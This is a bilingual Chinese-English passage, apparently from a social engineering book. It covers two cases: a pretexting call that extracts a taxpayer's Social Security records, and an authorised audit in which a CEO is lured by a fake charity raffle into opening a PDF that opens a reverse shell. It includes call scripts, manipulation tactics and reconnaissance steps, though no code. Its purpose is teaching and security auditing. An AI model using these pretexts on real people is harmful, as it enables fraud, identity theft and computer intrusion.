“嗯,情况是这样的,梅·林恩。我们有个新人,他还没有电脑,现在他有一个优先项目要做,所以他用我的电脑。我们是美国政府,天哪,他们说预算中没有足够的钱给这个人买电脑。现在我的老板认为我落后了,不想听任何借口,你知道吗?”

“Well, it’s like this, May Linn. We have a new guy who doesn’t have a computer yet, and right now he has a priority project to do so he’s using mine. We’re the government of the United States, for crying out loud, and they say they don’t have enough money in the budget to buy a computer for this guy to use. And now my boss thinks I’m falling behind and doesn’t want to hear any excuses, you know?”

 

“好吧,我知道你的意思。”

“I know what you mean, all right.”

 

“您能帮我快速查询一下 MCS 吗?”他问道,并使用了查找纳税人信息的计算机系统的名称。

“Can you help me with a quick inquiry on MCS?” he asked, using the name of the computer system for looking up taxpayer information.

 

“当然可以,您需要什么?”

“Sure, what do you need?”

 

“我需要你做的第一件事是对约瑟夫·约翰逊 (Joseph Johnson) 进行字母识别,他的出生日期是 1969 年 7 月 4 日。”(字母识别的意思是让计算机按纳税人姓名的字母顺序搜索账户,然后再根据出生日期进行识别。)

“The first thing I need you to do is an alphadent on Joseph Johnson, DOB 7/4/69.” (Alphadent means to have the computer search for an account alphabetically by taxpayer name, further identified by date of birth.)

 

“你需要了解什么?”

“What do you need to know?”

 

“他的账号是多少?”基思问道(他询问的是乔的社会保险号码)。

“What’s his account number?” Keith asks (this is Joe’s Social Security number he is asking for).

 

她读了下去。

She read it off.

 

“好的,我需要你对该帐号进行 numident 操作。”(numident与 alphadent 类似,只是它是数字搜索而不是字母搜索。)这是要求她读出纳税人的基本数据,May Linn 回答说纳税人的出生地、母亲的娘家姓和父亲的名字。Keith 耐心地听着,她还告诉他 Joe 的社会安全号码签发的月份和年份,以及签发该号码的地区办事处。

“Okay, I need you to do a numident on that account number.” (Numident is similar to alphadent, only it’s a numerical search instead of an alphabetical one.) This was a request for her to read off the basic taxpayer data, and May Linn responded by giving the taxpayer’s place of birth, mother’s maiden name, and father’s name. Keith listened patiently while she also gave him the month and year Joe’s Social Security number was issued, and the district office it was issued by.

 

基思接下来要求进行 DEQY(发音为“DECK-wee”;是“详细收入查询”的缩写。)

Keith next asked for a DEQY (pronounced “DECK-wee”; it’s short for “detailed earnings query.”)

 

“哪一年?”

“For what year?”

 

“2001年。”

“Year 2001.”

 

梅林恩表示:“金额为 190,286 美元,付款人是 Johnson MicroTech。”

May Linn said, “The amount was $190,286, and the payer was Johnson MicroTech.”

 

“还有其他工资吗?”

“Any other wages?”

 

“不。”

“No.”

 

“谢谢,”基思说。“你太客气了。”

“Thanks,” Keith said. “You’ve been very kind.”

 

然后,基思试图安排在需要信息但“无法使用电脑”时给她打电话,这使用了社会工程师最喜欢的伎俩,即始终尝试建立联系,以便他可以不断地回到同一个人身边,避免每次都要寻找新目标的麻烦。

Keith then tried to arrange to call her whenever he needed information and “couldn’t get to his computer,” using a favorite trick of social engineers of always trying to establish a connection so that he can keep going back to the same person, avoiding the nuisance of having to find a new mark each time.

 

“下周不行,”她告诉他,因为她要去肯塔基参加姐姐的婚礼。其他时间,她会尽其所能。

“Not next week,” she told him, because she was going to Kentucky for her sister’s wedding. Any other time, she’d do whatever she could.

 

此时,一切似乎都结束了。Keith 已经获得了他想要获得的所有信息,现在只需给银行和海外账户打电话,有了这些信息,这已经变得容易多了。

At this point it seemed like game over. Keith had all the information he set out to obtain and now it was just a matter of calling the banks and offshore accounts, which, armed with the information he had, had now become a much easier task.

 

一次执行得非常好并且真正令人敬畏的袭击。

A well-executed and truly awe-inspiring attack.

 

将 SE 框架应用于 SSA 黑客攻击

Applying the SE Framework to the SSA Hack

 

刚刚描述的 SSA 攻击让你大吃一惊。你可以从这次使用社会工程框架的攻击中学到很多东西。

The SSA attack just described leaves your mouth ajar and eyes wide. You can learn much from this particular attack, which used the social engineering framework.

 

基思从收集信息开始攻击。你可能真的厌倦了听我一遍又一遍地说这句话,但拥有信息确实是每一次成功的社会工程攻击的关键——你拥有的信息越多越好。

Keith started the attack with information gathering. You are probably really tired of hearing me say this over and over again, but having information is truly the crux of every good social engineer attack—the more you have, the better.

 

基思首先在网上发现了一条真正令人惊叹的情报,令人震惊的是,这条情报至今仍在网上,网址为https://secure.ssa.gov/apps10/poms.nsf/

Keith first found a truly amazing piece of intel on the Web, which dumbfoundingly enough, is still online at https://secure.ssa.gov/apps10/poms.nsf/.

 

此链接将引导您进入社会保障管理局项目运营的在线手册。它包含缩写、术语和说明,以及社会保障管理局员工可以告诉执法部门的内容。有了这些信息,基思知道该问什么、怎么问、如何听起来像他属于这里,以及哪些信息会引起警觉。

This link directs you to an online manual for Program Operations of the Social Security Administration. It contains abbreviations, lingo, and instructions as well as what SSA employees are allowed to tell law enforcement. Armed with this information, Keith knew what to ask, how to ask, and how to sound like he belonged, as well as what information would raise red flags.

 

尽管该链接提供了大量信息,但他还是决定进一步收集信息,以监察长办公室员工的身份进行伪装,并致电当地社会保障局办公室。他确实打破了常规,利用当地办公室获取内部号码,以完成内部员工的伪装。

Although the link provided a wealth of information, he decided to take his information gathering a step further using the pretext of an Inspector General Office employee and calling his local SSA office. He really thought outside the box, by using his local office to obtain the internal numbers needed to complete his pretext as an internal employee.

 

基思换了几次借口,而且做得很娴熟。他能够通过使用在线 SSA 手册来设计正确的问题,从而获得所需的大部分信息。事实证明,这本手册是诱导开发者的梦想。凭借正确的词语和语言,他听起来很适合这个角色。他建立了融洽的关系和框架,完美地满足了借口。建立融洽关系并非易事,但基思做得很好,而且表明他熟练掌握了这项技术。他使用了许多影响策略来确保目标感到舒适和自在。例如,他巧妙地将义务和回报结合在一起。当他通过描述缺乏良好的工具和缺乏管理层的支持来获得梅·林恩的支持时,她感到有义务帮助他。

Keith switched pretexts a couple of times and did so masterfully. He was able to obtain much of the information he needed by using the online SSA manual to develop the right questions. This manual proved to be an elicitation developer’s dream. Armed with the right words and language, he sounded like he fit right in. He built rapport and a frame that fed the pretexts perfectly. Building rapport is not an easy task, but Keith did it well and in a way that indicated he was well practiced in this technique. He used many influence tactics to make sure the target felt comfortable and at ease. For example, he mixed obligation and reciprocation artfully. When he was able to get May Linn on his side by describing the lack of good tools and the lack of support from his management, she felt obligated to help him out.

 

他还使用了能引起同情但又能显示其权威的关键词和短语,例如“我的老板对我很不满意”,这表明他有麻烦了,而 SSA 员工 May Linn 可以拯救他。人们有道德义务去拯救那些需要帮助的人。当有人寻求帮助时,很少有人能置之不理,May Linn 也不能。她不仅觉得有必要提供帮助,甚至还应该告诉 Keith 她的私人日程安排。

He also used keywords and phrases that commanded empathy and yet showed his authority, such as “my boss is not happy with me,” which gives an indication that he is in trouble and that the SSA employee, May Linn, can save him. People have a moral obligation to save those in need. Not many can walk away when someone is asking for help, and May Linn couldn’t either. She felt compelled to not only help, but to even tell Keith about her personal schedule.

 

最后,Keith 使用了框架中的许多重要技能,这些技能不需要个人现场亲自行动。

In the end, Keith used a number of important skills in the framework that do not involve personal onsite, in-person action.

 

政府系统是由人来管理的,这一事实使得它们很容易受到本文所用黑客手段的攻击。这并不是在为发明机器人或计算机系统来完成这些工作而辩解;它只是指出,这些系统中的许多系统都过于依赖工作过度、薪水过低、压力过大的人,因此操纵他们并不是一件很难的事。

The fact that governmental systems are run by people make them fallible to the hacking methods used in this story. This is not an argument for the invention of robotic or computerized systems to do these jobs; it merely points to the fact that many of these systems rely so much on overworked, underpaid, overstressed people that manipulating them is not a very hard job.

 

说实话,改进这种特殊的攻击非常困难,因为我自己永远不会执行这种攻击,而 Keith 在应用框架原理方面做得非常出色。

To be honest, improving upon this particular attack is difficult because it is not one I would ever perform myself and Keith did a superb job of applying the principles of the framework.

 

许多人已经习惯了被虐待、辱骂和大喊大叫,所以只要有一点点善意,他们就会竭尽全力去帮助别人。米特尼克的《欺骗的艺术》中转述的这次袭击表明,依赖人的系统是多么脆弱。

So many people are used to being mistreated, abused, and yelled at that a little bit of kindness can make them go to extraordinary heights to help out. This particular attack as relayed in Mitnick’s The Art of Deception shows how vulnerable systems that rely on people truly are.

 

Hadnagy案例研究1:过度自信的首席执行官

Hadnagy Case Study 1: The Overconfident CEO

 

我与一位过度自信的首席执行官的经历很有趣,因为这位首席执行官认为自己不会受到任何社会工程攻击,原因有二:首先,他在个人生活中很少使用科技;其次,他觉得自己很聪明,不会陷入所谓的“愚蠢的游戏”。

My experience with an overconfident CEO is interesting because the CEO thought he would be impervious to any social engineering attempt for two reasons: First, he did not utilize technology much in his personal life, and second, he felt that he was too smart and protected to fall for what he called “silly games.”

 

听完这些后,他的内部安全团队决定让我把重点放在他身上作为审计的目标。他们知道,如果他真的没有通过审计,那么他们就更容易获得批准实施许多有助于他们安全的修复措施。

With that being said to his internal security team they decided to ask me to focus on him as the goal of the audit. They knew that if he did fail the audit it would be easier to get approval to implement many of the fixes that would help their security.

 

目标

The Target

 

目标是美国一家规模不小的印刷公司,该公司拥有一些专有流程和供应商,而其竞争对手正在追逐这些流程和供应商。IT 和安全团队意识到该公司存在一些弱点,并说服首席执行官进行审计。在与我的合伙人的电话会议中,首席执行官傲慢地表示,他知道“黑客几乎不可能攻击他,因为他用生命守护着这些秘密。”甚至他的一些核心员工也不知道所有细节。

The target was a decent-sized printing company in the U.S. that had some proprietary processes and vendors that some of its competitors were after. The IT and security teams realized the company had some weaknesses and convinced the CEO an audit was needed. In a phone meeting with my partner, the CEO arrogantly said that he knew that “hacking him would be next to impossible because he guarded these secrets with his life.” Not even some of his core staff knew all the details.

 

作为 SE 审计员,我的工作是潜入公司,获取保存这些专有信息的公司服务器之一的访问权限并检索这些信息。正如 CEO 在电话中提到的那样,困难在于服务器的密码存储在他的电脑上,未经他的许可,任何人都无法访问它,甚至连安全人员也不行。

My job as the SE auditor was to infiltrate the company to obtain access to one of the company’s servers where this proprietary information was held and retrieve it. The difficulty, as the CEO had mentioned on the phone, was that the passwords for the servers were stored on his computer and no one had access to it, not even the security staff, without his permission.

 

故事

The Story

 

显然,进入的方式必须由 CEO 参与,这带来了挑战,因为他已经做好准备并等待渗透尝试。我像做任何工作一样开始工作——收集信息。我使用在线资源和其他工具(如 Maltego)研究了这家公司。我能够收集服务器位置、IP 地址、电子邮件地址、电话号码、物理地址、邮件服务器、员工姓名和头衔等信息。

Apparently, the way in would have to involve the CEO, which presented a challenge because he was ready and waiting for an infiltration attempt. I started off as I did with any gig—by information gathering. I researched the company using online resources and other tools such as Maltego. I was able to harvest information such as locations of servers, IP addresses, e-mail addresses, phone numbers, physical addresses, mail servers, employee names and titles, and much more.

 

当然,我以一种方便日后使用的方式记录了所有这些信息。电子邮件的结构很重要,因为当我搜索网站时,我发现它是firstname.lastname@company.com。我找不到首席执行官的电子邮件地址,但许多文章在他们的网站上列出了他的名字(我们称他为 Charles Jones)和头衔。这将是一个标准的、不知情的攻击者能够获得的信息。

Of course, I documented all this information in a fashion that made it easy to use later on. The structure of the e-mail was important because as I searched the website I saw that it was firstname.lastname@company.com. I could not locate the CEO’s e-mail address but many articles listed his name (let’s call him Charles Jones) and title on their site. This would be information a standard, non-informed attacker would be able to obtain.

 

我尝试使用firstname.lastname@company.com格式向他发送电子邮件。但没有成功。我当时真的很失望,因为我确信电子邮件方法会提供很多有趣的细节。

Using the firstname.lastname@company.com format, I tried to send an e-mail to him. It didn’t work. I was actually disappointed at this moment, because I was sure that the e-mail method would yield a lot of juicy details.

 

我决定给查尔斯取个昵称,于是尝试了chuck.jones@company.com。大获成功!我有一个经过验证的电子邮件地址。现在我只需验证它是首席执行官的,而不是其他同名的人的。

I decided to try a nickname for Charles, so I tried chuck.jones@company.com. Sweet success! I had a verified e-mail address. Now I just had to verify it was the CEO’s and not some other guy with the same name.

 

我花了更多时间在 Google 和 Maltego 上收集尽可能多的信息。Maltego 有一个很棒的转换功能,让我可以在域中搜索普通搜索引擎可以看到的任何文件。

I spent some more time on Google and Maltego to harvest as much information I could. Maltego has this great transform that allows me to search a domain for any files that would be visible to a normal search engine.

 

我对公司的域名进行了转换,结果浏览了大量文件。Maltego 并不止于通过此转换提供文件名。许多文件包含元数据,即有关日期、创建者和其他有关文件的小细节的信息。运行 Maltego 的元数据转换后,我发现这些文件中的大多数都是由“Chuck Jones”创建的。文件中的大部分内容都提到他是首席执行官。

I ran the transform against the company’s domain and was greeted with an amazing number of files for my browsing. Maltego doesn’t stop with just providing filenames with this transform. Many files contain metadata, which is the information about the dates, creators, and other little juicy tidbits about the file. Running Maltego’s metadata transform showed me that the majority of these files were created by a “Chuck Jones.” Much of the content in the files talked about him as the CEO.

 

这正是我需要的确认,但在浏览过程中,一个文件引起了我的注意——InvoiceApril.xls。阅读该文件后,我发现这是当地一家银行为查克参与的一项营销活动开具的发票。我知道银行名称、日期和金额,但我不知道该公司参与了哪些活动。

This was the confirmation I needed, but during my browsing one file had caught my eye—InvoiceApril.xls. Upon reading that file I discovered it was an invoice from a local bank for a marketing venture Chuck was involved in. I had the bank name, the date, and the amount, but I didn’t have the event the company was a part of.

 

我快速搜索了银行网站,但由于该活动发生在六个月前,因此网站上没有列出。我该怎么办?

I did a quick search of the bank website but because the event was six months earlier it was not listed on the site. What could I do?

 

我决定给银行的营销人员打电话:

I decided to place a call to the marketing person from the bank:

 

“您好,我是 [CompanyName] 的 Tom。我正在整理我们的书籍,我看到这里有一张 4 月份的发票,上面写着 3,500 美元的赞助套餐费用。我没有看到活动名称 — 你能告诉我那张发票的用途吗?”

“Hi, this is Tom from [CompanyName]. I am trying to organize our books and I see an invoice here from April for $3,500 as a sponsorship package. I don’t see the event name—can you please tell me what that invoice was for?”

 

“当然,汤姆,”她说,我听到背景中传来咔哒声。“我看这是银行一年一度的儿童癌症基金活动,你是银色包裹中的一员。”

“Sure, Tom,” she said and I heard some clicking noise in the background. “I see that was the bank’s annual Children’s Cancer Fund Drive and you were part of the Silver Package.”

 

“非常感谢;我是新来的,非常感谢你的帮助。稍后再聊。”

“Thanks a lot; I am new here and I appreciate your help. Talk with you later.”

 

我开始看到了我可以使用的一个可能的攻击媒介的图像,但我需要更多的研究,并且需要进行一次非常精心策划的电话通话。

I was beginning to see a picture of a possible attack vector that I could use, but I needed some more research and I needed to make a very carefully planned phone call.

 

我在网上找到了几篇关于这次募捐活动的文章,以及有多少公司从社区各处来到这里,为癌症治疗研究提供资金支持。此外,我对这位首席执行官的了解越多,就越了解他。我有他父母的名字、他姐妹的名字、他在 Facebook 上发布的孩子们的照片、他住在父母附近时去过的教堂、他写的关于他最喜欢的餐馆、他最喜欢的运动队、他大儿子最喜欢的运动队的评论,以及他上过的大学、他的孩子上过的学校,等等。

I found a few articles on the Web about this fundraiser and how many companies came from all over the community to support it with money for cancer treatment research. In addition, the more digging I did into the CEO the more I found out about him. I had his parents’ names, his sisters’ names, pictures of his kids that he has on Facebook, the church he went to when he lived near his parents, a review he wrote of his favorite restaurant, his favorite sporting team, his oldest son’s favorite sporting team and where he attended college, where his kids go to school, and the list goes on and on.

 

我想知道这家公司为什么会向儿童癌症基金会捐款。虽然许多恶意的社会工程师会利用他人的情感,而且我意识到自己也不得不走这条路,但我想知道他是否因为他的一个儿子患有癌症而参与了这项基金。我给公司的营销总监打了个电话:

I wanted to find out why the company donates to the Children’s Cancer Fund. Although many malicious social engineers exploit others’ emotions, and I realized I might have to go down that path as well, I wanted to know whether the fund was something he was involved in because one of his sons has cancer. I placed a call to the marketing director of the company:

 

“您好,我是 XYZ 的汤姆。我受雇于城里的第一国民银行,负责给参加四月儿童癌症基金会的人员打电话,我想问一下您能否占用我几分钟时间,以便征求一下您的反馈?”

“Hello, this is Tom from XYZ. I was hired by First National Bank in town to call those who took part in the April Children’s Cancer Fund and I was wondering whether I could take a few minutes of your time to get some feedback?”

 

“当然可以,”营销总监苏说。

“Sure,” Sue, the marketing director, said.

 

“Sue,我看你是 4 月份我们银牌套餐的成员。你觉得你获得的营销服务值得你付出的价格吗?”

“Sue, I see that you were part of our Silver Package in April. Did you feel the marketing you received was worth the price you paid?”

 

“嗯,这是我们每年都会做的事情,而且确实为我们在当地赢得了很多媒体曝光机会。我想我不会介意在网站上看到更多关于银色套餐的信息。”

“Well, this is something we do every year and it does get us a lot of press time in the local area. I guess I wouldn’t mind seeing a little more on the website for the Silver Package.”

 

“非常好,我会记下来的。每年——是的,我看到你每年都这样做。我个人想知道,有这么多筹款活动,你为什么选择这个?”

“Excellent; I will note that. Every year—yes, I can see you do this every year. I am wondering personally, with so many fundraisers out there why did you choose this one?”

 

“我知道查克一直对这件事很重视。他是我们的首席执行官,我认为他的家人中有人曾与癌症抗争。”

“I know Chuck has always been particular to this one. He is our CEO and I think someone in his family battled cancer.”

 

“噢,我很遗憾听到这个消息。这不是他自己的孩子吧?”

“Oh my; I am sorry to hear that. It isn’t his own children is it?”

 

“不,我想是侄子或表亲。我们并没有真正谈论过这件事。”

“No, I think a nephew or cousin. We didn’t really talk about it.”

 

“嗯,我们非常感谢您的捐赠和支持。”

“Well, we certainly appreciate your donations and support.”

 

我又问了几个问题,然后就结束了,感谢她抽出时间,然后我们就分手了。

I finished up with a few more questions and then left it at that, thanking her for her time, and we parted ways.

 

我得到了我需要的信息——不是他的孩子得了癌症。再说一次,我知道这不会阻止恶意的社会工程师,但我非常好奇。有了这些信息,我就可以计划我的攻击方式了。

I got the information I needed—it wasn’t one of his kids who had cancer. Again, I knew this wouldn’t stop a malicious social engineer, but I was very curious. Armed with this information I was ready to plan my attack vector.

 

我知道这位首席执行官来自纽约,他最喜欢的餐厅是一家叫 Domingoes 的餐厅。他经常带孩子来观看大都会队的比赛,然后他们会去 Domingoes 吃饭。

I knew the CEO was originally from New York and his favorite restaurant was a place called Domingoes. He would bring his kids in often for a Mets game and then they would go eat at Domingoes.

 

他给这家餐厅打了分,还说了自己最喜欢的三道菜。我从他在 Facebook 上写的其他内容中得知,他的父母仍然住在附近,而且他经常来这里。

He wrote some ratings on the place and talked about his top three favorite dishes. I knew his parents still lived close by and he visited often from some other things he wrote on Facebook.

 

我计划将我的攻击媒介定为癌症研究筹款。该活动面向三州地区,只要捐款一小笔,捐赠者的名字就会被输入到抽奖活动中。抽奖奖品是两张大都会队比赛门票和三张餐厅优惠券中的一张,其中一张是 Domingoes。

I planned my attack vector to be a fundraiser for cancer research. It was for the tri-state area and for a small donation one’s name would be entered into a raffle. The raffle prize would be two tickets to a Mets game and a choice of three restaurant coupons, one of which was Domingoes.

 

我会假装自己来自纽约,但相对较新,以防他向我抛出我不知道的东西。

I would pretend to be from New York myself, but relatively new, in case he threw things at me I didn’t know.

 

我的最终目标是让他接受我发送的 PDF,该 PDF 经过恶意编码,为我提供反向 shell,并允许我访问他的计算机。如果他使用的 Adob​​e 版本不允许我访问,那么我会试图说服他下载一个 zip 文件并执行嵌入恶意文件的 EXE 文件。

My end goal would be for him to accept a PDF from me that would be maliciously encoded to give me a reverse shell and allow me access to his computer. If he did not use a version of Adobe that would allow me access, then I would try to convince him to download a zip file and execute an enclosed EXE that would have the malicious file embedded.

 

我练习了将用作借口的电话交谈,测试了我的 PDF 和 EXE 文件,并打开了 Google 地图,找到了 Domingoes 的位置,这样我就可以公开谈论该地区。在我准备好电脑并等待接收受害者的恶意负载后,我准备拨打电话。

I practiced the phone conversation I would use for my pretext, I tested my PDF and EXE files, and I had Google Maps open to the location of Domingoes so I could talk about that area openly. After I had my computer ready and waiting to receive the malicious payload from the victim, I was ready to place the call.

 

我下午 4 点左右打电话,因为我从公司网站上得知办公室周五 4:30 关门。由于我没参加安排此次审计的首次电话会议(我的合伙人参加了),首席执行官没能认出我的声音。

I placed the phone call around 4:00 p.m., because I found out through the company website that the office closes at 4:30 on Fridays. Because I wasn’t on the initial meeting phone call to set up this audit, (my partner was), the CEO would not recognize my voice.

 

“您好,查尔斯·琼斯先生有空吗?”

“Hello, is Mr. Charles Jones available?”

 

“当然,等一下。”电话那头的声音听起来有些疲惫,准备转接我。

“Sure one second.” The voice on the other end sounded tired and was ready to transfer me.

 

“你好,我是查克。”

“Hello, Chuck speaking.”

 

“您好,琼斯先生,我叫托尼,来自美国癌症研究所。我们正在开展年度募捐活动,以支持对困扰男性、女性和儿童的癌症的研究。”

“Hello, Mr. Jones, my name is Tony from the Cancer Research Institute of America. We are running an annual fund drive to support our research into cancers that plague men, women, and children.”

 

“请叫我查克,”他打断道。

“Please, call me Chuck,” he interrupted.

 

这是个好兆头,因为他没有给我任何借口,也没有试图以忙为由结束通话;他主动将谈话变得个性化。我继续说:“查克,谢谢你。我们正在为以前支持过癌症基金的公司开展募捐活动,要求捐款 50 至 150 美元。最棒的是,每个帮助我们的人都有机会参加抽奖,赢取两个大奖。如果你赢了,你将获得两张纽约大都会队比赛的门票,然后在三家很棒的餐厅之一享用双人免费晚餐。我们将提供五份这样的套餐。”

This was a good sign because he didn’t give me any excuses or try to end the phone call saying he was busy; he took it upon himself to personalize the conversation. I continued, “Chuck, thank you. We are running a fund drive for companies who supported cancer funds before and are asking for small donations of $50–$150 dollars. The great part is that everyone who helps us out is being entered into a drawing for two great prizes. If you win you get two tickets to a Mets game in NYC and then a free dinner for two at one of three great restaurants. We are giving out five of those packages.”

 

“大都会队比赛,真的吗?”

“Mets game, really?”

 

“我知道,如果你不喜欢大都会队,这个奖品可能对你没有吸引力,但这里的餐馆很不错。”

“I know, if you don’t like the Mets the prize might not appeal to you, but the restaurants are good.”

 

“不,不,我爱大都会队,所以我这么说。我很高兴。”

“No, no, I love the Mets, that’s why I said that. I was happy.”

 

“好吧,想想看——你不仅帮助了一个伟大的研究基金,而且你还可以参加一场精彩的比赛,还可以去 Morton's、Basil's 或 Domingoes 吃饭。”

“Well think about this—not only are you helping out a great research fund but you get a good game in and you get to eat at Morton’s, Basil’s, or Domingoes.”

 

“Domingoes!真的!我很喜欢那个地方。”

“Domingoes! Really! I love that place.”

 

“哈,太棒了。你知道我前几天晚上第一次去那里,吃了他们的鸡肉波特贝拉。太棒了。”这是他第三喜欢的菜。

“Ha, that is great. You know I just went there the other night for the first time and had their Chicken Portabella. It was awesome.” This was his third-favorite dish.

 

“哦,如果你觉得那个不错,那就算了,你需要尝尝 Fra Diablo。它确实是那里最好的菜。我一直都吃它。”

“Oh, if you think that is good, forget it, you need to try the Fra Diablo. It is really the best dish in there. I eat it all the time.”

 

“我周末会再去那里,我一定会去试试。谢谢你的提示。听着,我知道已经很晚了。现在我甚至不想收钱,我不通过电话收钱。我能做的就是把 PDF 发给你;你可以看看,如果你有兴趣,你可以把支票和表格一起寄给你。”

“I am going there again over the weekend, I will definitely try it out. Thanks for the tip. Look, I know it is getting late. Right now I am not even looking for money, I don’t take money over the phone. What I can do is send you the PDF; you can look at it and if you are interested you can just mail the check in with the form.”

 

“好啊,发过来吧。”

“Heck yeah, send it over.”

 

“好的,我只想问几个问题。你的电子邮箱是?”

“Okay just a couple questions. What is your e-mail?”

 

地址: “ chuck.jones@company.com ”。

chuck.jones@company.com.”

 

“如果可以,请打开您的 PDF 阅读器,单击“帮助”菜单和“关于”,然后告诉我版本号。”

“If you can, open your PDF reader, click the Help menu and About, and tell me the version number please.”

 

“等一下,现在是8点04分。”

“One minute; it is 8.04.”

 

“太好了,我不想给你发一个你用不了的版本。我们通话时,请稍等片刻,我会把这个发给你——好的,已经发了。”

“Excellent; I don’t want to send you a version that you can’t use. Just one second while we are on the phone I am going to send this to you—okay, it’s sent.”

 

“太好了,谢谢。我希望我能赢;我真的很喜欢那个地方。”

“Great, thanks. I hope I win; I really love that place.”

 

“我知道,食物很好吃。在我让你走之前,你能不能先检查一下你是否收到了电子邮件,然后告诉我它是否正常工作?”

“I know; the food is good. Before I let you go, could you just check to see whether you got the e-mail and let me know if it is working?”

 

“当然,我大约五分钟后就会退出,但我可以检查一下。是的,它在这里。”当我听到双击的声音时,我看向 BackTrack 电脑,看到我的恶意有效载荷收集器 Meterpreter(参见第 7 章)正在做出反应。我屏住呼吸(因为这部分永远不会无聊),砰,shell 出现了。我的 Meterpreter 脚本将所有权更改为类似Explorer.exe 的东西。

“Sure, I am logging out in about five minutes, but I can check. Yep, it is here.” When I heard the sound of double-clicking, I looked over on my BackTrack computer saw my malicious payload collector, Meterpreter (see Chapter 7), reacting. I was holding my breath (because this part never gets boring) and bam, the shell appeared. My Meterpreter scripts changed the ownership to something like Explorer.exe.

 

查克接着说:“嗯,我看到的只是一个空白屏幕。它什么也没做。”

Chuck then said, “Hmm, all I got is a blank screen. It’s not doing anything.”

 

“真的吗?这很奇怪。让我检查一下。”我真正想检查的是,我是否可以访问他的驱动器,以及是否可以上传一个在关机时在重启时运行的反向 shell。我说:“对不起,我不知道发生了什么。你能给我一分钟吗,还是你需要走了?”

“Really? That’s odd. Let me check here.” What I was really checking was that I had access to his drive and the ability to upload a reverse shell that would run on reboot in case he shut down. I said, “I am sorry, I don’t know what happened. Can you give me a minute or do you need to go?”

 

“好吧,我得去喝完这个咖啡杯了,所以我会放下电话,马上回来。”

“Well I need to go empty this coffee mug, so I will put the phone down and be back in a minute.”

 

“太好了,谢谢。”这一分钟足以让我确定自己可以不受限制地再次访问他的电脑。他回来了。

“Excellent, thanks.” That minute was all I needed to make sure I had unlimited and returning access to his computer. He came back.

 

“后退。”

“Back.”

 

“好吧,查克,我真的很尴尬,但我不知道发生了什么。我不想耽误你,所以你为什么不去呢?我会在给你制作另一个 PDF 时通过电子邮件将此发送给你。我们可以周一再联系。”

“Well, Chuck, I’m really embarrassed but I don’t know what happened. I don’t want to hold you up, so why don’t you go and I will e-mail this to you when I make you another PDF. We can touch base Monday.”

 

“好的,没问题。祝你周末愉快。”

“Okay, no problem. Have a great weekend.”

 

“你也是,查克。”

“You, too, Chuck.”

 

我们分手了,令我惊讶和欣喜的是,他的电脑仍然开着,并且处于活动状态。是的,他把所有东西都保存在一个只有他才能访问的安全驱动器中,但都是 Word 文档。我立即下载了这些 Word 文档,几个小时内,我就可以访问服务器并打印出他想要保护的所有内部流程。

We parted ways and to my surprise and extreme joy his computer remained on and active. Yes, he kept everything in a secure drive that only he had access to, but in Word documents. I promptly downloaded those Word documents and within a few hours I had access to the servers and printed out all the internal processes he wanted to protect.

 

我们确实在周一早上进行了联系,不是以筹款人托尼的身份,而是以他的安全顾问的身份,带着他的“秘密”、密码的打印件,以及他和他的员工通话的录音。

We did touch base on Monday morning, not as Tony the fund-raiser, but as his security consultants with printouts of his “secrets,” his passwords, and recordings of the phone calls that were made to him and his staff.

 

成功攻击后的首次会面总是充满着客户的最初震惊,并声称我们使用了不公平的策略和个人弱点来获取访问权限。当我们解释说坏人会使用完全相同的策略时,愤怒的表情变成了恐惧,恐惧变成了理解。

This first meeting after a successful attack is always filled with the client’s initial shock and claims that we used unfair tactics and personal weaknesses to gain access. When we explain that the bad guys will use the exact same tactics, the look of anger turns to fear, and that fear turns to understanding.

 

将 SE 框架应用于过度自信的 CEO 攻击

Applying the SE Framework to the Overconfident CEO Hack

 

与前面的例子一样,将案例应用到社会工程框架中,看看哪些是好的,哪些是可以改进的,这些都是很有益处的。

As in the previous examples, applying the case to the social engineering framework and seeing what was good and what could have been improved upon can be beneficial.

 

一如既往,信息收集是任何社会工程工作的关键,这个故事就说明了这一点。从网络、Maltego、电话等多个来源收集信息是这次攻击成功的关键。信息不足会导致惨败。

As always, information gathering is the key to any social engineering effort, and this particular story shows it. Information gathering from many sources—the Web, Maltego, the phone, and more—is what made this attack successful. Insufficient information would have led to a miserable failure.

 

正确而丰富的信息至关重要,即使是我根本不需要的信息,比如他的教堂,以及他父母和兄弟姐妹的名字。这些东西在我需要的时候很有用,但事实证明,关于电子邮件命名约定和使用 Maltego 的服务器上的文件的信息是无价的。这是我进入这家公司的途径。

Proper and plentiful information makes all the difference, even information I never needed, like his church, and his parents’ and siblings’ names. These things were useful to have in case I needed them, but what proved to be invaluable was the information found about the e-mail naming convention and the files on the servers using Maltego. This was the pathway to getting my foot into door of this company.

 

将您找到的信息分类保存到 BasKet 或 Dradis 中(如第 2 章所述)并随时可用也很重要;否则,您只会得到一个包含大量无法利用的信息的文本文件。组织信息与收集和使用信息同样重要。

Keeping the information you find cataloged into BasKet or Dradis, as discussed in Chapter 2, and ready to use is also important; otherwise, you just have a text file with a jumble of information you can’t make use of. Organizing the information is just as important as gathering and using it.

 

像坏人一样思考——即寻找利用目标弱点和欲望的方法——并不是这份工作最棒的部分,但如果专业审计师想要保护客户,他会向他们展示他们是多么脆弱。你收集的信息越多,找到弱点就越容易。你开始看到可以通向成功的途径。

Thinking like a bad guy—that is, looking for ways to exploit the weaknesses and desires of the target—isn’t a great part of the job, but if a professional auditor wants to protect clients, he will show them how vulnerable they are. The more information you gather, the easier finding vulnerabilities becomes. You begin to see pathways that can lead to success.

 

开发能够产生最大效果的现实借口和主题也有助于攻击成功。必须开发能够吸引目标的强力问题和关键词。通过收集大量信息,我能够开发出好的问题和框架,其中包含关键词和神经语言学 (NLP) 强力词,然后我将其用于影响策略,我相当确定这些策略会奏效。

Developing realistic pretexts and themes that will have the maximum effect also contributes to an attack’s success. One must develop power questions and keywords to use that will attract the target. By gathering a lot of information I was able to develop good questions and a frame that involved keywords and neurolinguistic (NLP) power words, which I then used in influence tactics that I was fairly sure would work.

 

我的借口经常要变,从打电话给公司的供应商到打电话给内部员工询问信息。我必须计划好每个借口,融入角色,并成功贯彻。当然,这需要大量的计划,以确保每个借口听起来都正确、流畅且合理。

My pretext had to change often, from calling the company’s vendors to calling internal employees for information. I had to plan out each pretext, get into that character, and successfully follow through. This, of course, took a lot of planning to make sure each pretext sounded right, flowed properly, and made sense.

 

熟能生巧。在发起攻击之前,我和我的搭档练习了一切。我必须确保 PDF 有效,并且向量有意义。我还必须具备足够的知识,才能让当时与我交谈的任何目标都信服我。

